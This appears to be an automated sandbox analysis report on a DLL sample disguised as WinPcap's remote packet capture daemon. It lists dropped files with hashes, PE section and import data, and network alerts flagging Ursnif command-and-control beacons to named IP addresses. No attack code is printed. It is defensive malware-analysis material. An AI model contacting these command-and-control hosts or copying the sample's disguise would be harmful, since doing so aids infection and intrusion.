SSDEEP: | 192:Rrl7r3GLNiZn6G6YWWSUNyhrgmf6SADCpDC89blIsf1Xm:RrlsNip6G6YHSUNyNgmf6SPl7fI |
MD5: | 200A84F499DC72FD79C80AC1ABF562A1 |
SHA1: | 59D0B0B50A1CA026C76D23B10B5AE9516BA42656 |
SHA-256: | DF336B8F18E82E0A30B4208F3CD578AE350D14B4B56595A2C3473B179DDB5EDD |
SHA-512: | 1A663B31D424E65894CD1B80CABC6264AC46703C25FF48AFBB0774916AAA9D9253E01B737327C2A7232C593044CC033B55651AE5EEF69CE520CAC0A0ADFCE4C7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4552 |
Entropy (8bit): | 4.428569707945006 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zs3JgtWI9cyWgc8sqYjhA8fm8M4J2+bFAi+q84SuKcQIcQw0td:uITfZnTgrsqY19JIi9Kkw0td |
MD5: | FB43A3FC62E071B1DBC23E84CB772DD6 |
SHA1: | 288EBE5F6A8CAEA0D6DBD06717F4EAF63993F5C0 |
SHA-256: | BD063170EB5612BBAB66D683DFB4FBE1E45A552C38AB78BEB1531317E1A46F15 |
SHA-512: | D5F04F9A163F9AD013F866CF7FAA3D607E95D0309AD1323DB1C1C14179CB820E194C6EDBF4575B304D07B1E4608F009958A3487FE78698250E9DEF949E64ED6F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.307755680441488 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fJbUzxs7+AEszIWXp+N23fJv9n:p37Lvkmb6KHBbUWZE8Bv9 |
MD5: | 5B0D34AB7FC0503D0305BAC26EADCAB8 |
SHA1: | 99AC5DF8A3C994E4E25D883C26373C73961FAF16 |
SHA-256: | BDBBAA42822DC8A5B71DD83ED5A2AB297D8B6A06512DB4C4119FC8C02B278E96 |
SHA-512: | 1E89514E0112E1985072DCF8D451022024EE4D57761F8F7A08348FCA0BCDC34F75E053AECCFF5E7F2DB3B028568162ED7511630F01BEED4AF9CB30550AB309D2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.650746474841338 |
Encrypted: | false |
SSDEEP: | 24:etGSlmMWWOJy853Ek0s2E7OgpjdWQzbtkZfKkItOWI+ycuZhNr8akSwRPNnq:6+vz5UkGE7vpRWQzqJKv11ulr8a3wjq |
MD5: | 9B779EB942011AA97B3FF87AFC8F2EBB |
SHA1: | F3BB609C9BDA0DD930C74EB96E28F67EB86B4063 |
SHA-256: | 094C3D747A71AD1FBFC7BE41C39B9C7F79D7C260762452730F0E81A630203D42 |
SHA-512: | 057ECF5D4A71EBA995A7320F298991D0CC5A140C9D1BCA992C2273004A21CBA7E7C71B6F6B49093CBBFF61842A8F9213D7C52CAB2E434945CCC72D319846EDBF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.343017693214738 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KHBb1E8BwKaM5DqBVKVrdFAMBJTH:Akka6ABb1E8BwKxDcVKdBJj |
MD5: | 4B73CFC2D1AAE022B79D53BC52ABC97A |
SHA1: | 5DC66A408A4243BE305D8E727D31DA358DFABCB3 |
SHA-256: | 04D4663B70557DDBFA040331184F27F022F5B58A178DD16A332F365BF315E0C0 |
SHA-512: | 93B471E965B4342EA379AD56E9D402607344C3B10A0124A8D8BAD44BE5289FB9CB5DBD0E1EAC95A6F7021C834C83460CD3FA169DBD11A5ACBFB82EC6472D2149 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.101674785919322 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryjal+ak7Ynqq4alfPN5Dlq5J:+RI+ycuZhNs+akSnfPNnqX |
MD5: | B10E8DC1EB7DECCBCFE409387AD9EBFD |
SHA1: | 312FDE3DB9DD172220D18418FAA92D20DB91885B |
SHA-256: | 93BAECCC900AD9C4C31FA9A99FA33BB71B1E27F87CCA5DD6E7A0FDAA5E6542CA |
SHA-512: | 2ED4ACAF9066D8F4B0789C81633B3943B6717D713099914351779E72E70A36C834225FA51FB62E18E9472933EBBA43F90AD8376EE42703761A7A12DC08BFE64B |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1070071339744105 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry58ak7YnqqwRPN5Dlq5J:+RI+ycuZhNr8akSwRPNnqX |
MD5: | E7E788336D9983FA182A2E032CF5BA1A |
SHA1: | BCC1A8A1ACBC5540787B969305097043F8759599 |
SHA-256: | C73DFB2C08CAE90FDFE7C541E2B69A8F4B49F8130F91BC5DB31B82EB113D296B |
SHA-512: | E1EAC6ECC9E49A08CF9CD82F935EE6FF5263CB9C27BCCC9C0D21B5A0030BD9E23A1B887C383EDDE519E017CF53302DC89B284D42E7CB1159E6E27AC234C1DEE5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1316 |
Entropy (8bit): | 3.978467147955079 |
Encrypted: | false |
SSDEEP: | 24:HCIS9Qigkg4s4hHJYhKdNWI+ycuZhNs+akSnfPNnq9Gd:7ig9woKd41uls+a3n9q92 |
MD5: | 9442DD0E8D1231C6880831A1BAB6F2F2 |
SHA1: | 3F1B97FBB3A487A43EA5F4474DDCF1629FBED769 |
SHA-256: | 36AA793B10AE773AD7FAF41608C6257022985367F54A124A5BCC80D8CFDF0E24 |
SHA-512: | 6C307C6DD12D635C37F087A794B8A4EDB2AA975D197A828FA94AE98C820398FBACDCA19151DAFF0DE0C0CC05120935E8A7402FAEE3F8E5D7F230C888B5B11563 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9832080815912887 |
Encrypted: | false |
SSDEEP: | 24:HNnW9Q3HWxijhHThKdNWI+ycuZhNr8akSwRPNnq9hgd:Z5328NdKd41ulr8a3wjq9y |
MD5: | 4DCC0FD052D22F7C348CB25198EAFE3A |
SHA1: | B83F773846CF12113DD1D2FB0E8965F908413CD0 |
SHA-256: | 49F86C00D08E58B5F73EFD911D95B307FDFC99127141C032124D0694E318CDF1 |
SHA-512: | FB191D9CF8680BF44AAF852E0BC9EBB42A32B0BD3F82C22813AC0180C1E466C00F6F8017FC360C5AB41CF6E3AD8368F9E25314E153C9ED9759416BE33FE25FDF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.233616509891766 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fOQcqzxs7+AEszIWXp+N23fOQcdx:p37Lvkmb6KHX9WZE8XY |
MD5: | B09FC03F6F32FD7BFF1678B20710EACC |
SHA1: | 44DED5B7DD42B6C22CA7C448AB9114A8EA0DFCF8 |
SHA-256: | 008CD3ECE05E43CF30AA9A824086D2C74AED968A198DC5CDBC27BC4548C8AA68 |
SHA-512: | 387C45C7B6465B407CF53F09EB87F0E0D6D0A71958591D7D2667CE322B7CF927B2AB2079DFD2F892C6B71CCFC201182B43DB85F48B87583F2F8635D1B4B1F730 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6358141485539535 |
Encrypted: | false |
SSDEEP: | 24:etGSLm8+mUE7R853RY0kCGZ+4I4tkZffADZ0WI+ycuZhNs+akSnfPNnq:6LwXE7S50aJfOZX1uls+a3n9q |
MD5: | 94A8127680C746FAE1D7DF8EAB442F71 |
SHA1: | 4DBA9B41BAD4BB6C030C764095E435765127EBF5 |
SHA-256: | 4CFF361908979C591DBF57968B86BB2F44E38C91FE906AD376DC70353FB59579 |
SHA-512: | 7D6CD3375503B217FC269FF923F1D88C27AE7912AC34C6AA8CAB990A0745576E02FB09B9B9D74D8ECAF7849F0FF19E8A95D9124BCFC888FDFA53EF840D8FC516 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.3155037212616865 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KHX9WZE8XNKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHCE89KaM5DqBVKVrdFAMBJTH |
MD5: | F380E8169FAA19FC8CCFCEEC54390870 |
SHA1: | 327BC06BDF17F5075A0F3DD4EAAB85538EB55385 |
SHA-256: | 373B54E6175914A5E03ED5C10E9293B59CB6F65B8DFCB496F3616351CB3065E2 |
SHA-512: | 353240D429BAF32998D1E99AB22D6F8C8E097A74671394799B6EB87BBF51F1123748CE55689EFF37A28CFDFE9135C942EA54ED99CBA43EB6F6E3DD248B8DB7AA |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.210979.yN_Qw8z3.20220422153314.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1359 |
Entropy (8bit): | 5.402564603202913 |
Encrypted: | false |
SSDEEP: | 24:BxSAqhxvBnD0x2DOXUWhpW0i5IPTLCHYt4qW+HjeTKKjX4CIym1ZJXi9pW0i5IPo:BZkvhD0oOBNi5I4Yt4t+qDYB1ZSNi5Iw |
MD5: | C169E3B2744936B4A87A09EE7EEB0838 |
SHA1: | 8EEE154E1E17280881C7B5A038D5920A642378D9 |
SHA-256: | 241713E498DC5947C5110F802DF0D475C8402A98E29A74F914C9E689D2014D85 |
SHA-512: | 969FBC4B7425CD0E75A2C8B56741467EA283CD4876F9D60901623E5E29B94F0FA55828D10172D20F82ED0451D74C6C63FBCD6E136C97A9DED9E6A426805DB508 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.117696934685876 |
TrID: |
|
File name: | pDut.dll |
File size: | 641885 |
MD5: | b8eea1c2963c2f26ff4ffe8de869c3cc |
SHA1: | 2a8a13db7afd001f093a2c6f82bc6ed93b1884c5 |
SHA256: | 86ef41e44779b109e70b7d34c011b341c2d90654b149a718a380205287256bef |
SHA512: | e1d4583f769c996b99787c662fe12575f4242ad5ac2251ed3bc9c4d6129794a716493342f9bc207bc4f3e0736ae351a5bbd7c03e36ea2d3fd6e5e51f0abf8a65 |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZFB:+w1lEKOpuYxiwkkgjAN8ZFB |
TLSH: | 65D4BD1A029B2102EBB6CE78A751636C55174CE09B01E2CFC9190DA395E34FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data | | |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-15:33:01.649952 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
04/22/22-15:32:39.565574 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49728 | 80 | 192.168.2.3 | 13.107.43.16 |
04/22/22-15:32:59.896476 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
04/22/22-15:33:00.692984 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 15:33:00.638372898 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.692984104 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.716757059 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072814941 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072858095 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072875023 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072899103 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072921991 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072937965 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072942972 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.072958946 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072973013 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.072982073 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072998047 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073029041 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073124886 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073147058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073162079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073178053 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073203087 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073368073 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073385000 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073420048 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073457003 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113591909 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113703012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113758087 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113801956 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113821983 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113842964 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113879919 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113882065 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113930941 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113944054 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113997936 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114007950 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114059925 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114059925 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114121914 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114196062 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114221096 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114276886 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114278078 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114339113 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114392996 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114408970 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114469051 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114470005 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114531994 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114583015 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114594936 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114645004 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114646912 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114707947 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114762068 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114763975 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114814043 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154377937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154438019 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154467106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154501915 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154526949 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154566050 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154669046 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154700041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154741049 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154759884 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154767990 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154788971 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154814005 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
